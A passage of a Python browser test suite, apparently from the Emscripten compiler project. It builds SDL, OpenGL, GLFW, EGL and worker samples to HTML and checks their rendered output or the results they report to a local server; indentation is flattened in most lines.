self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
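    # The worker lazily reads /bigfile over synchronous XHR from the helper server
    # started below and reports its adler32 checksum back to the page.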
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
    checksum = zlib.adler32(data) & 0xffffffff # mask to unsigned 32 bits (adler32 may return a signed value on Python 2)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
    for _ in range(60):
      try:
        urlopen('http://localhost:11111')
        break
      except Exception:
        print('(sleep for server)')
        time.sleep(1)
    else:
      # for/else: only reached if we never broke out, i.e. the server never came up
      raise Exception('chunked XHR helper server failed to start')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
    # test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by the dEQP test suite (we can remove this test later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
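    # Each run passes a different flag (-r/-g/-b) via Module['arguments'] and is
    # compared against the matching single-color reference image.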
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
